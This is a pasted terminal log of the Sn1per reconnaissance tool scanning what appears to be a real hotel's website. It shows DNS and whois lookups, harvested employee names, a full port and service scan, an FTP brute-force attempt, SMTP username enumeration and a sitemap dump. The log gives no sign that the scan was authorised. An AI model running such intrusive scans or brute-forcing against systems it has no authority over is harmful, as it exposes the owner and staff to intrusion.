Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- root@kali:~/Sn1per-master# ./sniper
- ____
- _________ / _/___ ___ _____
- / ___/ __ \ / // __ \/ _ \/ ___/
- (__ ) / / // // /_/ / __/ /
- /____/_/ /_/___/ .___/\___/_/
- /_/
- + -- --=[http://crowdshield.com
- + -- --=[sn1per v1.3 by 1N3
- + -- --=[Usage: sn1per <target>
- root@kali:~/Sn1per-master# clear
- [3;J
- root@kali:~/Sn1per-master# ./sniper www.lasdunashotel.com
- [3;J
- ____
- _________ / _/___ ___ _____
- / ___/ __ \ / // __ \/ _ \/ ___/
- (__ ) / / // // /_/ / __/ /
- /____/_/ /_/___/ .___/\___/_/
- /_/
- + -- --=[http://crowdshield.com
- + -- --=[sn1per v1.3 by 1N3
- ################################### Running recon #################################
- Server: 192.168.179.2
- Address: 192.168.179.2#53
- Non-authoritative answer:
- www.lasdunashotel.com canonical name = lasdunashotel.com.
- Name: lasdunashotel.com
- Address: 192.185.26.214
- www.lasdunashotel.com is an alias for lasdunashotel.com.
- lasdunashotel.com has address 192.185.26.214
- lasdunashotel.com mail is handled by 0 lasdunashotel.com.
- ; <<>> DiG 9.9.5-9+deb8u3-Debian <<>> -x www.lasdunashotel.com
- ;; global options: +cmd
- ;; Got answer:
- ;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 18269
- ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
- ;; OPT PSEUDOSECTION:
- ; EDNS: version: 0, flags:; MBZ: 0005 , udp: 4000
- ;; QUESTION SECTION:
- ;com.lasdunashotel.www.in-addr.arpa. IN PTR
- ;; AUTHORITY SECTION:
- in-addr.arpa. 5 IN SOA b.in-addr-servers.arpa. nstld.iana.org. 2015072210 1800 900 604800 3600
- ;; Query time: 162 msec
- ;; SERVER: 192.168.179.2#53(192.168.179.2)
- ;; WHEN: Tue Sep 29 12:04:56 EDT 2015
- ;; MSG SIZE rcvd: 131
- Whois Server Version 2.0
- Domain names in the .com and .net domains can now be registered
- with many different competing registrars. Go to http://www.internic.net
- for detailed information.
- No match for "WWW.LASDUNASHOTEL.COM".
- >>> Last update of whois database: Tue, 29 Sep 2015 16:04:44 GMT <<<
- NOTICE: The expiration date displayed in this record is the date the
- registrar's sponsorship of the domain name registration in the registry is
- currently set to expire. This date does not necessarily reflect the expiration
- date of the domain name registrant's agreement with the sponsoring
- registrar. Users may consult the sponsoring registrar's Whois database to
- view the registrar's reported date of expiration for this registration.
- TERMS OF USE: You are not authorized to access or query our Whois
- database through the use of electronic processes that are high-volume and
- automated except as reasonably necessary to register domain names or
- modify existing registrations; the Data in VeriSign Global Registry
- Services' ("VeriSign") Whois database is provided by VeriSign for
- information purposes only, and to assist persons in obtaining information
- about or related to a domain name registration record. VeriSign does not
- guarantee its accuracy. By submitting a Whois query, you agree to abide
- by the following terms of use: You agree that you may use this Data only
- for lawful purposes and that under no circumstances will you use this Data
- to: (1) allow, enable, or otherwise support the transmission of mass
- unsolicited, commercial advertising or solicitations via e-mail, telephone,
- or facsimile; or (2) enable high volume, automated, electronic processes
- that apply to VeriSign (or its computer systems). The compilation,
- repackaging, dissemination or other use of this Data is expressly
- prohibited without the prior written consent of VeriSign. You agree not to
- use electronic processes that are automated and high-volume to access or
- query the Whois database except as reasonably necessary to register
- domain names or modify existing registrations. VeriSign reserves the right
- to restrict your access to the Whois database in its sole discretion to ensure
- operational stability. VeriSign may restrict or terminate your access to the
- Whois database for failure to abide by these terms of use. VeriSign
- reserves the right to modify these terms at any time.
- The Registry database contains ONLY .COM, .NET, .EDU domains and
- Registrars.
- For more information on Whois status codes, please visit
- https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en.
- *******************************************************************
- * *
- * | |_| |__ ___ /\ /\__ _ _ ____ _____ ___| |_ ___ _ __ *
- * | __| '_ \ / _ \ / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| *
- * | |_| | | | __/ / __ / (_| | | \ V / __/\__ \ || __/ | *
- * \__|_| |_|\___| \/ /_/ \__,_|_| \_/ \___||___/\__\___|_| *
- * *
- * TheHarvester Ver. 2.6 *
- * Coded by Christian Martorella *
- * Edge-Security Research *
- * cmartorella@edge-security.com *
- *******************************************************************
- [-] Searching in Google:
- Searching 0 results...
- Searching 100 results...
- [+] Emails found:
- ------------------
- No emails found
- [+] Hosts found in search engines:
- ------------------------------------
- No hosts found
- *******************************************************************
- * *
- * | |_| |__ ___ /\ /\__ _ _ ____ _____ ___| |_ ___ _ __ *
- * | __| '_ \ / _ \ / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| *
- * | |_| | | | __/ / __ / (_| | | \ V / __/\__ \ || __/ | *
- * \__|_| |_|\___| \/ /_/ \__,_|_| \_/ \___||___/\__\___|_| *
- * *
- * TheHarvester Ver. 2.6 *
- * Coded by Christian Martorella *
- * Edge-Security Research *
- * cmartorella@edge-security.com *
- *******************************************************************
- [-] Searching in Bing:
- Searching 50 results...
- Searching 100 results...
- [+] Emails found:
- ------------------
- @www.lasdunashotel.com
- [+] Hosts found in search engines:
- ------------------------------------
- No hosts found
- *******************************************************************
- * *
- * | |_| |__ ___ /\ /\__ _ _ ____ _____ ___| |_ ___ _ __ *
- * | __| '_ \ / _ \ / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| *
- * | |_| | | | __/ / __ / (_| | | \ V / __/\__ \ || __/ | *
- * \__|_| |_|\___| \/ /_/ \__,_|_| \_/ \___||___/\__\___|_| *
- * *
- * TheHarvester Ver. 2.6 *
- * Coded by Christian Martorella *
- * Edge-Security Research *
- * cmartorella@edge-security.com *
- *******************************************************************
- [-] Searching in Linkedin..
- Searching 100 results..
- Users from Linkedin:
- ====================
- Israel Junior Martinez Alvarez
- Virginia De Miguel
- Barry Ivan WHITE
- Luisa Kiss
- *******************************************************************
- * *
- * | |_| |__ ___ /\ /\__ _ _ ____ _____ ___| |_ ___ _ __ *
- * | __| '_ \ / _ \ / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| *
- * | |_| | | | __/ / __ / (_| | | \ V / __/\__ \ || __/ | *
- * \__|_| |_|\___| \/ /_/ \__,_|_| \_/ \___||___/\__\___|_| *
- * *
- * TheHarvester Ver. 2.6 *
- * Coded by Christian Martorella *
- * Edge-Security Research *
- * cmartorella@edge-security.com *
- *******************************************************************
- [-] Searching in 123People..
- Searching 0 results...
- Searching 100 results...
- Users from 123People:
- =====================
- [+] Emails found:
- ------------------
- No emails found
- [+] Hosts found in search engines:
- ------------------------------------
- dnsenum.pl VERSION:1.2.3
- ----- www.lasdunashotel.com -----
- Host's addresses:
- __________________
- lasdunashotel.com. 5 IN A 192.185.26.214
- Name Servers:
- ______________
- ns838.websitewelcome.com. 5 IN A 192.185.26.188
- ns837.websitewelcome.com. 5 IN A 192.185.26.183
- Mail (MX) Servers:
- ___________________
- lasdunashotel.com. 5 IN A 192.185.26.214
- Trying Zone Transfers and getting Bind Versions:
- _________________________________________________
- Trying Zone Transfer for www.lasdunashotel.com on ns837.websitewelcome.com ...
- AXFR record query failed: timeout
- Trying Zone Transfer for www.lasdunashotel.com on ns838.websitewelcome.com ...
- AXFR record query failed: timeout
- brute force file not specified, bay.
- ./sniper: línea 78: bin/dnsdict6: Permiso denegado
- + -- --=[Checking for SPF records on www.lasdunashotel.com...
- ################################### Pinging host ###################################
- PING lasdunashotel.com (192.185.26.214) 56(84) bytes of data.
- 64 bytes from 192-185-26-214.unifiedlayer.com (192.185.26.214): icmp_seq=1 ttl=128 time=267 ms
- --- lasdunashotel.com ping statistics ---
- 1 packets transmitted, 1 received, 0% packet loss, time 0ms
- rtt min/avg/max/mdev = 267.345/267.345/267.345/0.000 ms
- ################################### Running port scan ##############################
- Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-09-29 12:05 EDT
- Warning: 192.185.26.214 giving up on port because retransmission cap hit (6).
- Nmap scan report for www.lasdunashotel.com (192.185.26.214)
- Host is up (0.091s latency).
- rDNS record for 192.185.26.214: 192-185-26-214.unifiedlayer.com
- Not shown: 972 closed ports, 11 filtered ports
- PORT STATE SERVICE VERSION
- 21/tcp open ftp Pure-FTPd
- 25/tcp open smtp Exim smtpd 4.85
- |_smtp-commands: SMTP EHLO www.lasdunashotel.com: failed to receive data: connection closed
- 26/tcp open smtp Exim smtpd 4.85
- |_smtp-commands: Couldn't establish connection on port 26
- |_ssl-date: 2015-09-29T16:14:13+00:00; -3s from scanner time.
- 53/tcp open domain?
- 80/tcp open http nginx 1.8.0
- |_http-methods: No Allow or Public header in OPTIONS response (status code 200)
- |_http-server-header: nginx/1.8.0
- |_http-title: Hoteles en Ica Peru Las Dunas Hotel & Resort
- 110/tcp open pop3 Dovecot pop3d
- |_pop3-capabilities: AUTH-RESP-CODE RESP-CODES TOP PIPELINING SASL(PLAIN LOGIN) STLS CAPA USER UIDL
- | ssl-cert: Subject: commonName=*.websitewelcome.com
- | Not valid before: 2015-01-05T00:00:00
- |_Not valid after: 2018-01-04T23:59:59
- |_ssl-date: TLS randomness does not represent time
- 119/tcp open nntp?
- 143/tcp open imap Dovecot imapd
- |_imap-capabilities: OK AUTH=PLAIN listed LOGIN-REFERRALS AUTH=LOGINA0001 Pre-login more IDLE have capabilities IMAP4rev1 ID LITERAL+ post-login ENABLE SASL-IR NAMESPACE STARTTLS
- | ssl-cert: Subject: commonName=*.websitewelcome.com
- | Not valid before: 2015-01-05T00:00:00
- |_Not valid after: 2018-01-04T23:59:59
- |_ssl-date: TLS randomness does not represent time
- 443/tcp open ssl/ssl Apache httpd (SSL-only mode)
- | http-cisco-anyconnect:
- |_ ERROR: Not a Cisco ASA or unsupported version
- |_http-methods: No Allow or Public header in OPTIONS response (status code 302)
- |_http-server-header: Apache
- | http-title: 404 - PAGE NOT FOUND
- |_Requested resource was /404.html
- | ssl-cert: Subject: commonName=*.websitewelcome.com
- | Not valid before: 2015-01-05T00:00:00
- |_Not valid after: 2018-01-04T23:59:59
- |_ssl-date: 2015-09-29T16:14:19+00:00; -3s from scanner time.
- 465/tcp open ssl/smtp Exim smtpd 4.85
- |_smtp-commands: Couldn't establish connection on port 465
- 563/tcp open tcpwrapped
- 587/tcp open smtp Exim smtpd 4.85
- |_smtp-commands: SMTP EHLO www.lasdunashotel.com: failed to receive data: connection closed
- |_ssl-date: TLS randomness does not represent time
- 993/tcp open ssl/imap Dovecot imapd
- | imap-capabilities:
- |_ ERROR: Failed to connect to server
- | ssl-cert: Subject: commonName=*.websitewelcome.com
- | Not valid before: 2015-01-05T00:00:00
- |_Not valid after: 2018-01-04T23:59:59
- |_ssl-date: TLS randomness does not represent time
- 995/tcp open ssl/pop3 Dovecot pop3d
- |_pop3-capabilities: SASL(PLAIN LOGIN) UIDL PIPELINING TOP USER CAPA AUTH-RESP-CODE RESP-CODES
- | ssl-cert: Subject: commonName=*.websitewelcome.com
- | Not valid before: 2015-01-05T00:00:00
- |_Not valid after: 2018-01-04T23:59:59
- |_ssl-date: TLS randomness does not represent time
- 2222/tcp open ssh OpenSSH 5.3 (protocol 2.0)
- 3306/tcp open mysql MySQL 5.5.42-37.1
- | mysql-info:
- | Protocol: 53
- | Version: .5.42-37.1
- | Thread ID: 17268187
- | Capabilities flags: 65535
- | Some Capabilities: InteractiveClient, Support41Auth, Speaks41ProtocolNew, IgnoreSpaceBeforeParenthesis, FoundRows, SupportsLoadDataLocal, SupportsCompression, Speaks41ProtocolOld, ConnectWithDatabase, SupportsTransactions, LongColumnFlag, LongPassword, IgnoreSigpipes, ODBCClient, DontAllowDatabaseTableColumn, SwitchToSSLAfterHandshake
- | Status: Autocommit
- |_ Salt: ;LM{G/S4JXY:RnS6Ry+f
- 8080/tcp open http nginx 1.8.0
- |_http-methods: No Allow or Public header in OPTIONS response (status code 200)
- |_http-server-header: nginx/1.8.0
- |_http-title: Hoteles en Ica Peru Las Dunas Hotel & Resort
- 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
- SF-Port119-TCP:V=6.49BETA4%I=7%D=9/29%Time=560AB833%P=i586-pc-linux-gnu%r(
- SF:NULL,5C,"400\x20Cannot\x20connect\x20to\x20NNTP\x20server\x20192\.185\.
- SF:26\.214\x20\(192\.185\.26\.214:119\),\x20connect\x20error\x2010061\r\n"
- SF:);
- Device type: WAP|general purpose|storage-misc
- Running (JUST GUESSING): Actiontec Linux (95%), Linux 2.4.X|3.X (94%), Microsoft Windows 7|2012|XP (92%), BlueArc embedded (87%)
- OS CPE: cpe:/o:actiontec:linux_kernel cpe:/o:linux:linux_kernel:2.4 cpe:/o:linux:linux_kernel:3 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_server_2012 cpe:/o:microsoft:windows_xp::sp3 cpe:/h:bluearc:titan_2100
- Aggressive OS guesses: Actiontec MI424WR-GEN3I WAP (95%), DD-WRT v24-sp2 (Linux 2.4.37) (94%), Linux 3.2 (93%), Microsoft Windows 7 or Windows Server 2012 (92%), Microsoft Windows XP SP3 (92%), BlueArc Titan 2100 NAS device (87%)
- No exact OS matches for host (test conditions non-ideal).
- Network Distance: 2 hops
- Service Info: Host: canto.websitewelcome.com
- TRACEROUTE (using port 80/tcp)
- HOP RTT ADDRESS
- 1 0.10 ms 192.168.179.2
- 2 0.10 ms 192-185-26-214.unifiedlayer.com (192.185.26.214)
- OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 537.35 seconds
- ################################### Running Intrusive Scans ########################
- + -- --=[Port 21 opened... running tests...
- Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-09-29 12:14 EDT
- Nmap scan report for www.lasdunashotel.com (192.185.26.214)
- Host is up (0.023s latency).
- rDNS record for 192.185.26.214: 192-185-26-214.unifiedlayer.com
- PORT STATE SERVICE VERSION
- 21/tcp open ftp Pure-FTPd
- | ftp-brute:
- | Accounts: No valid accounts found
- | Statistics: Performed 27 guesses in 59 seconds, average tps: 0
- |_ ERROR: Too many retries, aborted ...
- Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 63.03 seconds
- + -- --=[Port 22 closed... skipping.
- + -- --=[Port 23 closed... skipping.
- + -- --=[Port 25 opened... running tests...
- Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-09-29 12:15 EDT
- Nmap scan report for 192.168.1.113
- Host is up (0.00057s latency).
- PORT STATE SERVICE VERSION
- 25/tcp open smtp?
- | smtp-brute:
- |_ ERROR: Failed to connect to SMTP server
- |_smtp-commands: Couldn't establish connection on port 25
- | smtp-enum-users:
- |_ Couldn't establish connection on port 25
- |_smtp-open-relay: Couldn't establish connection on port 25
- Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 176.47 seconds
- Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )
- ----------------------------------------------------------
- | Scan Information |
- ----------------------------------------------------------
- Mode ..................... VRFY
- Worker Processes ......... 5
- Usernames file ........... BruteX/simple-users.txt
- Target count ............. 1
- Username count ........... 58
- Target TCP port .......... 25
- Query timeout ............ 5 secs
- Target domain ............
- ######## Scan started at Tue Sep 29 12:18:44 2015 #########
- existsdunashotel.com: anonymous
- existsdunashotel.com: admin
- existsdunashotel.com: bee
- existsdunashotel.com: administrator
- existsdunashotel.com: administration
- existsdunashotel.com: apache
- ######## Scan completed at Tue Sep 29 12:19:14 2015 #########
- 6 results.
- 58 queries in 30 seconds (1.9 queries / sec)
- + -- --=[Port 53 opened... running tests...
- Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-09-29 12:19 EDT
- Nmap scan report for 192.168.1.113
- Host is up (0.00073s latency).
- PORT STATE SERVICE VERSION
- 25/tcp open smtp?
- Host script results:
- |_dns-brute: Can't guess domain of "192.168.1.113"; use dns-brute.domain script argument.
- Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 152.33 seconds
- + -- --=[Port 80 opened... running tests...
- Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-09-29 12:23 EDT
- Failed to resolve "www.lasdunashotel.com".
- WARNING: No targets were specified, so 0 hosts scanned.
- Nmap done: 0 IP addresses (0 hosts up) scanned in 2.45 seconds
- ^ ^
- _ __ _ ____ _ __ _ _ ____
- ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
- | V V // o // _/ | V V // 0 // 0 // _/
- |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
- <
- ...'
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking http://www.lasdunashotel.com
- ERROR:root:Site http://www.lasdunashotel.com appears to be down
- http://www.lasdunashotel.com [200] Country[UNITED STATES][US], HTTPServer[nginx/1.8.0], IP[192.185.26.214], nginx[1.8.0]
- ./sniper: línea 179: xsstracer: no se encontró la orden
- + -- --=[Checking if X-Content options are enabled on www.lasdunashotel.com...
- + -- --=[Checking if X-Frame options are enabled on www.lasdunashotel.com...
- + -- --=[Checking if X-XSS-Protection header is enabled on www.lasdunashotel.com...
- + -- --=[Checking HTTP methods on www.lasdunashotel.com...
- + -- --=[Checking if TRACE method is enabled on www.lasdunashotel.com...
- + -- --=[Checking for open proxy on www.lasdunashotel.com...
- <html>
- <head>
- <meta name="robots" content="noarchive" />
- <meta name="googlebot" content="nosnippet" />
- </head>
- <body>
- <div align=center>
- <h3>Error. Page cannot be displayed. Please contact your service provider for more details. (1)</h3>
- </div>
- </body>
- </html>
- + -- --=[Enumerating software on www.lasdunashotel.com...
- Server: nginx/1.8.0
- + -- --=[Checking if Strict-Transport-Security is enabled on www.lasdunashotel.com...
- + -- --=[Checking for Flash cross-domain policy on www.lasdunashotel.com...
- <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
- <html><head>
- <title>302 Found</title>
- </head><body>
- <h1>Found</h1>
- <p>The document has moved <a href="http://www.lasdunashotel.com/index.php">here</a>.</p>
- <hr>
- <address>Apache Server at www.lasdunashotel.com Port 80</address>
- </body></html>
- + -- --=[Checking for Silverlight cross-domain policy on www.lasdunashotel.com...
- <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
- <html><head>
- <title>302 Found</title>
- </head><body>
- <h1>Found</h1>
- <p>The document has moved <a href="http://www.lasdunashotel.com/index.php">here</a>.</p>
- <hr>
- <address>Apache Server at www.lasdunashotel.com Port 80</address>
- </body></html>
- + -- --=[Checking for HTML5 cross-origin resource sharing on www.lasdunashotel.com...
- + -- --=[Retrieving robots.txt on www.lasdunashotel.com...
- <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
- <html><head>
- <title>302 Found</title>
- </head><body>
- <h1>Found</h1>
- <p>The document has moved <a href="http://www.lasdunashotel.com/index.php">here</a>.</p>
- <hr>
- <address>Apache Server at www.lasdunashotel.com Port 80</address>
- </body></html>
- + -- --=[Retrieving sitemap.xml on www.lasdunashotel.com...
- <?xml version="1.0" encoding="UTF-8"?>
- <urlset
- xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"
- xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
- xsi:schemaLocation="http://www.sitemaps.org/schemas/sitemap/0.9
- http://www.sitemaps.org/schemas/sitemap/0.9/sitemap.xsd">
- <!-- created with Free Online Sitemap Generator www.xml-sitemaps.com -->
- <url>
- <loc>http://lasdunashotel.com/</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/quienes_somos.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/habitaciones.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/servicios.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/paquetes.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/eventos.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/galeria.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/informacion.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/contactenos.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/banner-no-perder.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/recomienda.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/registrese.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/index.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/banner-full-day.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/ubicacion.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/responsabilidad-social.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/sitemap.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/habitaciones.php?pk_habitacion=1</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/habitaciones.php?pk_habitacion=2</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/habitaciones.php?pk_habitacion=3</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/habitaciones.php?pk_habitacion=4</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/habitaciones.php?pk_habitacion=5</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/habitaciones.php?pk_habitacion=6</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/habitaciones.php?pk_habitacion=7</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/habitaciones.php?pk_habitacion=8</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/habitaciones.php?pk_habitacion=9</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/compara.php?pk_habitacion=1</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/paquetes.php?pk_habitacion=1</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/galeria.php?IdGaleria=27</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/tarifas.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/servicios_detalle.php?pk_hotel_servicio=2</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/servicios_detalle.php?pk_hotel_servicio=3</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/servicios_detalle.php?pk_hotel_servicio=4</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/servicios_detalle.php?pk_hotel_servicio=5</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/servicios_detalle.php?pk_hotel_servicio=6</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/servicios_detalle.php?pk_hotel_servicio=7</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/servicios_detalle.php?pk_hotel_servicio=8</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/servicios_detalle.php?pk_hotel_servicio=11</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/servicios_detalle.php?pk_hotel_servicio=12</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/servicios_detalle.php?pk_hotel_servicio=13</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/servicios_detalle.php?pk_hotel_servicio=14</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/servicios_detalle.php?pk_hotel_servicio=17</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/servicios_detalle.php?pk_hotel_servicio=18</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/paquetes-request.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/eventos-salones.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/eventos-programas.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/cuestionario.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/galeria.php?pk_media_categoria=3</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/galeria.php?pk_media_categoria=4</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/galeria.php?pk_media_categoria=5</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/galeria.php?pk_media_categoria=6</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/galeria.php?pk_media_categoria=30</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/galeria.php?pk_media_categoria=39</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/informacion-turistica.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/quienes_somos.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/habitaciones.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/servicios.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/paquetes.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/eventos.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/galeria.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/informacion.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/contactenos.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/banner-no-perder.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/en/recomienda.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/galeria.php?IdGaleria=2</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/compara.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/informacion-turistica-detalle.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/informacion-turistica-detalle-nazca.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/informacion-turistica-detalle-paracas.php</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/compara.php?pk_habitacion=2</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/paquetes.php?pk_habitacion=2</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/compara.php?pk_habitacion=3</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/paquetes.php?pk_habitacion=3</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/compara.php?pk_habitacion=4</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/paquetes.php?pk_habitacion=4</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/compara.php?pk_habitacion=5</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/paquetes.php?pk_habitacion=5</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/compara.php?pk_habitacion=6</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/paquetes.php?pk_habitacion=6</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/compara.php?pk_habitacion=7</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/paquetes.php?pk_habitacion=7</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/compara.php?pk_habitacion=8</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/paquetes.php?pk_habitacion=8</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/compara.php?pk_habitacion=9</loc>
- <changefreq>always</changefreq>
- </url>
- <url>
- <loc>http://lasdunashotel.com/paquetes.php?pk_habitacion=9</loc>
